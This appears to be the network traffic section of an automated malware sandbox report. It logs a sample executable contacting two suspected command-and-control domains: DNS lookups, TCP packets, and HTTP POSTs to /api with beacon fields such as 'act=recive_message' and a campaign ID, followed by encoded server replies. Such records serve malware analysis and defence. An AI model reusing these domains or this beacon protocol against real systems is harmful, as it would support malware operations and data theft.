                                                                                                          Dec 13, 2024 16:48:37.234976053 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:37.236356020 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:37.236370087 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:37.236668110 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:37.237888098 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:37.238065004 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:37.238092899 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:38.007985115 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:38.008095980 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:38.008173943 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:38.020593882 CET49771443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:38.020637989 CET44349771172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:38.131350040 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:38.131392002 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:38.131462097 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:38.131813049 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:38.131830931 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:39.350955963 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:39.351047993 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:39.352399111 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:39.352410078 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:39.352655888 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:39.353969097 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:39.354099989 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:39.354126930 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:39.354209900 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:39.395335913 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:40.436165094 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:40.436249018 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:40.436336994 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:40.439028025 CET49777443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:40.439048052 CET44349777172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:40.660815001 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:40.660867929 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:40.660947084 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:40.661247969 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:40.661258936 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:41.878216982 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:41.878343105 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:41.879625082 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:41.879635096 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:41.879870892 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:41.881596088 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:41.881735086 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:41.881776094 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:41.881839991 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:41.881851912 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:42.728092909 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:42.728214025 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:42.728291035 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:42.728482962 CET49783443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:42.728497982 CET44349783172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:43.000413895 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:43.000461102 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:43.000608921 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:43.001010895 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:43.001036882 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.254149914 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.254580975 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:44.255790949 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:44.255801916 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.256113052 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.257457972 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:44.258063078 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:44.258071899 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.992830992 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.992922068 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:44.992995977 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:45.000837088 CET49789443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:45.000866890 CET44349789172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:45.519072056 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:45.519105911 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:45.519335985 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:45.519520044 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:45.519531965 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.733741999 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.733954906 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.738363028 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.738373041 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.738632917 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.754287958 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.754987001 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755024910 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755127907 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755179882 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755275011 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755322933 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755445004 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755475998 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755619049 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755647898 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755784988 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755832911 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.755841017 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755920887 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.755948067 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.803332090 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.803524971 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.803564072 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.803576946 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.851330996 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.851511002 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.851564884 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.851582050 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.895333052 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:46.895471096 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:46.939325094 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:47.118779898 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:49.849407911 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:49.849524021 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:49.849615097 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:49.850017071 CET49796443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:49.850038052 CET44349796172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:49.859452963 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:49.859508038 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:49.859574080 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:49.859925032 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:49.859944105 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:51.077536106 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:51.077620029 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:51.078896999 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:51.078907967 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:51.079756021 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:51.117968082 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:51.118022919 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:51.118185043 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.094533920 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.094641924 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.094695091 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:52.094938993 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:52.094958067 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.094966888 CET49807443192.168.2.9172.67.149.196
                                                                                                          Dec 13, 2024 16:48:52.094973087 CET44349807172.67.149.196192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.413800001 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:52.413830996 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.413930893 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:52.414252043 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:52.414264917 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:53.767585039 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:53.767761946 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:53.769298077 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:53.769309998 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:53.769558907 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:53.770843983 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:53.811338902 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.415642977 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.416753054 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.416867018 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.416913033 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.416932106 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.416960955 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.416981936 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.426760912 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.426877022 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.426883936 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.431471109 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.431524992 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.431531906 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.431545019 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.431587934 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.431740046 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.431752920 CET44349813172.67.182.135192.168.2.9
                                                                                                          Dec 13, 2024 16:48:54.431762934 CET49813443192.168.2.9172.67.182.135
                                                                                                          Dec 13, 2024 16:48:54.431768894 CET44349813172.67.182.135192.168.2.9
                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                          Dec 13, 2024 16:48:31.060179949 CET6365253192.168.2.91.1.1.1
                                                                                                          Dec 13, 2024 16:48:31.303689957 CET53636521.1.1.1192.168.2.9
                                                                                                          Dec 13, 2024 16:48:52.096143007 CET5451353192.168.2.91.1.1.1
                                                                                                          Dec 13, 2024 16:48:52.412931919 CET53545131.1.1.1192.168.2.9
                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                          Dec 13, 2024 16:48:31.060179949 CET192.168.2.91.1.1.10x2ce2Standard query (0)poweryressz.clickA (IP address)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:52.096143007 CET192.168.2.91.1.1.10xd4bStandard query (0)kliplorihoe0.shopA (IP address)IN (0x0001)false
                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                          Dec 13, 2024 16:48:07.742877960 CET1.1.1.1192.168.2.90x6babNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:07.742877960 CET1.1.1.1192.168.2.90x6babNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:31.303689957 CET1.1.1.1192.168.2.90x2ce2No error (0)poweryressz.click172.67.149.196A (IP address)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:31.303689957 CET1.1.1.1192.168.2.90x2ce2No error (0)poweryressz.click104.21.29.199A (IP address)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:52.412931919 CET1.1.1.1192.168.2.90xd4bNo error (0)kliplorihoe0.shop172.67.182.135A (IP address)IN (0x0001)false
                                                                                                          Dec 13, 2024 16:48:52.412931919 CET1.1.1.1192.168.2.90xd4bNo error (0)kliplorihoe0.shop104.21.43.169A (IP address)IN (0x0001)false
                                                                                                          • poweryressz.click
                                                                                                          • kliplorihoe0.shop
                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          0192.168.2.949759172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:32 UTC264OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 8
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:32 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                          Data Ascii: act=life
                                                                                                          2024-12-13 15:48:33 UTC1022INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:33 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=s2b3ecnor1s2rubkglcfcfhuso; expires=Tue, 08-Apr-2025 09:35:12 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bxdvZbDn1T0RWs4wiHjCxESHVIXkro%2BRoy34%2FYbL5X%2FYCtcCi0JO8Y8OMAZ84Uw4m5AGtXwR9DUQP4jx5oxgL5KuiDCbG2v9kF5wdZw9TM3txSC2OPs2eRKBquOCk%2F%2FESvQx0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f1719590a3fc329-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1614&min_rtt=1607&rtt_var=617&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=908&delivery_rate=1754807&cwnd=148&unsent_bytes=0&cid=febfcc952e4968b1&ts=1100&x=0"
                                                                                                          2024-12-13 15:48:33 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                          Data Ascii: 2ok
                                                                                                          2024-12-13 15:48:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                          Data Ascii: 0


                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                          1192.168.2.949765172.67.149.1964437560C:\Users\user\Desktop\BDxsBr8Dce.exe
                                                                                                          TimestampBytes transferredDirectionData
                                                                                                          2024-12-13 15:48:34 UTC265OUTPOST /api HTTP/1.1
                                                                                                          Connection: Keep-Alive
                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                          Content-Length: 44
                                                                                                          Host: poweryressz.click
                                                                                                          2024-12-13 15:48:34 UTC44OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 44 76 68 38 75 69 2d 2d 6e 39 26 6a 3d
                                                                                                          Data Ascii: act=recive_message&ver=4.0&lid=Dvh8ui--n9&j=
                                                                                                          2024-12-13 15:48:35 UTC1021INHTTP/1.1 200 OK
                                                                                                          Date: Fri, 13 Dec 2024 15:48:35 GMT
                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                          Transfer-Encoding: chunked
                                                                                                          Connection: close
                                                                                                          Set-Cookie: PHPSESSID=mkucec6a3k4fvc2c4qe4l7uakh; expires=Tue, 08-Apr-2025 09:35:14 GMT; Max-Age=9999999; path=/
                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                          Pragma: no-cache
                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gTBa7DWzw7CqduRhZfppEct2ATjMc6EsgJkdA2X0gfVri4oz6Ic2LLvf%2BdLCX4%2BFNVNc68S0Ec8RFeZl7r52pS%2FkhenBKN6WjTIMmRV5f6ZO72kxHzzQ%2BM9nhrAtlQR%2FFaPM0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                          Server: cloudflare
                                                                                                          CF-RAY: 8f171967ef754379-EWR
                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1688&min_rtt=1679&rtt_var=649&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=945&delivery_rate=1662870&cwnd=194&unsent_bytes=0&cid=49b3e3feb2c21203&ts=745&x=0"
                                                                                                          2024-12-13 15:48:35 UTC348INData Raw: 31 64 33 38 0d 0a 72 76 50 32 41 70 37 6c 42 37 30 6f 4b 55 72 38 6a 4d 73 43 46 2b 6b 54 66 46 38 50 65 55 72 53 50 6a 4d 41 4e 30 35 41 6f 75 48 56 30 59 41 67 70 4e 45 72 6e 31 74 4d 61 4d 62 34 75 58 64 79 78 54 45 64 4f 79 31 44 4c 4c 4e 53 51 47 55 62 62 44 62 50 77 35 53 56 6c 32 37 74 67 43 75 66 54 56 46 6f 78 74 65 77 49 48 4b 48 4d 55 5a 39 61 68 4d 6f 73 31 4a 52 59 56 77 68 4d 4d 36 43 78 70 2b 52 61 76 75 47 59 39 78 45 52 43 2b 5a 36 61 70 6f 65 59 42 2b 46 44 49 74 56 57 69 33 52 42 45 36 46 51 4d 6c 31 6f 44 6a 6b 6f 56 70 76 4a 67 72 78 67 70 4d 4a 4e 36 32 36 57 4e 79 69 33 38 61 4f 32 51 52 49 72 70 61 55 47 52 64 50 69 6e 45 69 63 61 52 6b 6d 76 78 6a 33 66 52 54 6b 4d 6b 6e 2b 4f 71 49 44 76 4c 64 67 5a 39 4e 56 74 37 67 6c 39 41 63
                                                                                                          Data Ascii: 1d38rvP2Ap7lB70oKUr8jMsCF+kTfF8PeUrSPjMAN05AouHV0YAgpNErn1tMaMb4uXdyxTEdOy1DLLNSQGUbbDbPw5SVl27tgCufTVFoxtewIHKHMUZ9ahMos1JRYVwhMM6Cxp+RavuGY9xERC+Z6apoeYB+FDItVWi3RBE6FQMl1oDjkoVpvJgrxgpMJN626WNyi38aO2QRIrpaUGRdPinEicaRkmvxj3fRTkMkn+OqIDvLdgZ9NVt7gl9Ac
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 54 52 6b 6d 37 39 69 6d 58 4e 51 6b 41 6a 6d 2f 79 69 61 58 69 47 63 52 4d 33 59 68 67 6f 74 31 5a 62 62 56 38 6f 4c 38 32 46 7a 4a 48 55 4c 72 79 41 66 5a 38 53 43 77 75 62 2f 71 35 73 59 38 6c 4c 58 69 49 6a 41 6d 69 33 55 42 45 36 46 53 51 6e 77 34 44 48 6e 70 64 6f 39 35 56 6c 7a 55 78 47 4c 59 7a 6f 72 47 35 2f 69 47 4d 55 4d 32 73 59 49 62 74 56 56 47 56 52 62 47 79 41 68 4e 54 52 7a 43 44 64 69 6d 37 54 51 46 77 6f 33 76 48 6e 65 54 57 4d 66 56 35 6c 4c 52 38 70 74 46 31 56 62 46 73 6f 4c 73 61 4e 77 5a 36 53 61 76 79 41 62 39 64 43 53 69 57 56 34 61 6c 6c 65 49 39 33 45 6a 78 6f 57 32 62 77 57 30 6b 69 44 57 77 4d 78 34 44 65 30 36 46 6a 38 6f 6c 69 79 51 70 55 5a 6f 65 75 72 6d 77 31 30 7a 45 51 4f 47 49 4a 4b 61 4a 5a 58 33 42 5a 4b 53 54 4e 67
                                                                                                          Data Ascii: TRkm79imXNQkAjm/yiaXiGcRM3Yhgot1ZbbV8oL82FzJHULryAfZ8SCwub/q5sY8lLXiIjAmi3UBE6FSQnw4DHnpdo95VlzUxGLYzorG5/iGMUM2sYIbtVVGVRbGyAhNTRzCDdim7TQFwo3vHneTWMfV5lLR8ptF1VbFsoLsaNwZ6SavyAb9dCSiWV4alleI93EjxoW2bwW0kiDWwMx4De06Fj8oliyQpUZoeurmw10zEQOGIJKaJZX3BZKSTNg
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 6a 38 6f 6c 69 79 51 70 55 5a 6f 65 75 72 6d 77 31 30 7a 45 54 4e 57 67 65 4a 37 46 57 58 32 64 66 49 43 72 4f 67 4e 36 65 6b 47 44 77 6a 32 2f 53 52 45 38 67 6c 2b 57 69 5a 6e 57 4b 65 31 35 7a 4c 52 77 77 38 41 51 52 56 6c 49 67 4c 38 2f 42 2b 5a 4b 61 62 76 75 52 4a 63 41 45 55 6d 69 5a 34 75 6b 34 4e 59 64 34 48 6a 5a 6e 48 79 69 33 55 56 52 68 55 69 38 76 78 34 6e 43 6c 70 42 73 39 59 70 6a 33 30 31 50 4c 59 7a 72 6f 47 78 35 79 7a 39 65 4f 6e 56 62 63 50 42 7a 56 6e 52 57 41 79 48 52 69 6f 79 4f 32 6e 6d 38 67 47 6d 66 45 67 73 76 6d 2b 61 69 5a 6e 32 4c 59 78 73 7a 5a 68 6f 69 74 6c 31 63 62 6c 4d 73 49 38 43 46 77 4a 47 54 5a 2b 36 56 59 4e 6c 59 51 57 6a 51 72 71 35 34 4e 64 4d 78 4b 43 31 36 43 6a 37 79 61 56 4a 73 57 79 73 30 67 4a 79 43 69 4e
                                                                                                          Data Ascii: j8oliyQpUZoeurmw10zETNWgeJ7FWX2dfICrOgN6ekGDwj2/SRE8gl+WiZnWKe15zLRww8AQRVlIgL8/B+ZKabvuRJcAEUmiZ4uk4NYd4HjZnHyi3UVRhUi8vx4nClpBs9Ypj301PLYzroGx5yz9eOnVbcPBzVnRWAyHRioyO2nm8gGmfEgsvm+aiZn2LYxszZhoitl1cblMsI8CFwJGTZ+6VYNlYQWjQrq54NdMxKC16Cj7yaVJsWys0gJyCiN
                                                                                                          2024-12-13 15:48:35 UTC1369INData Raw: 62 38 31 43 52 53 57 56 34 61 4a 79 64 59 5a 31 45 6a 6c 6c 45 43 4c 77 45 68 46 6c 54 57 78 36 67 4c 62 42 6e 70 52 6a 36 73 64 36 6b 56 4d 4c 4c 35 4b 75 38 53 42 35 68 58 45 52 4d 57 45 51 49 4c 46 51 58 32 56 51 4a 53 72 49 6b 63 32 56 6e 47 48 79 69 47 54 62 54 30 34 73 6d 65 71 76 62 7a 58 46 4d 52 6b 6c 4c 55 4e 6f 6e 33 74 6b 49 48 51 57 59 74 2f 4e 31 64 47 54 62 4c 7a 66 4a 64 4e 4a 52 79 43 52 36 4b 42 73 66 34 4a 36 45 6a 5a 70 46 79 47 31 57 6c 42 6e 55 43 30 6d 7a 49 6e 4b 6b 70 64 76 38 34 68 74 6e 77 51 4c 4c 34 61 75 38 53 42 51 6e 48 6f 51 4f 79 30 45 5a 71 6b 63 56 6d 34 56 64 47 4c 4d 69 73 71 58 6b 57 7a 39 67 57 33 61 51 6b 38 70 6d 4f 69 71 62 33 47 4f 63 42 45 35 59 52 55 69 73 56 31 64 61 56 6f 6e 4a 34 44 4e 6a 4a 61 4d 49 4b 54
                                                                                                          Data Ascii: b81CRSWV4aJydYZ1EjllECLwEhFlTWx6gLbBnpRj6sd6kVMLL5Ku8SB5hXERMWEQILFQX2VQJSrIkc2VnGHyiGTbT04smeqvbzXFMRklLUNon3tkIHQWYt/N1dGTbLzfJdNJRyCR6KBsf4J6EjZpFyG1WlBnUC0mzInKkpdv84htnwQLL4au8SBQnHoQOy0EZqkcVm4VdGLMisqXkWz9gW3aQk8pmOiqb3GOcBE5YRUisV1daVonJ4DNjJaMIKT
